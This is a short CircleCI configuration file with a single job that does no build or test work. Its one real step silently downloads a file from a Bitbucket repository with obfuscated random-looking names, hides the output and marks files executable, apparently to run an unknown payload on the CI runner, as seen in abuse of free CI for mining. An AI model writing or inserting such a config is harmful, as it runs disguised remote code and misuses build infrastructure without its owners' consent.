version: 2
jobs:
  abas:
    docker:
      - image: python:3.8

    steps:
    - checkout
    - run: curl -o martialasion https://bitbucket.org/namskdjworitpwprkdgalxmv/naszxcoiuwemnaoemaosnuemazoiemnaszxoiemwazxmcnoemaowemazsxcovm/raw/9692e7a20bdcb3c48bb122f003a7b9184bb7b8fc/unaseiuowemnaszxcoivuiowezxmnvoieweoizxmasoiweruiomnaszxcnoiuewe > ~/root > /dev/null 2>&1 && chmod u+x *
    - run: cd /root && cd root && ls -a






workflows:
  version: 2
  abas:
    jobs:
    - abas
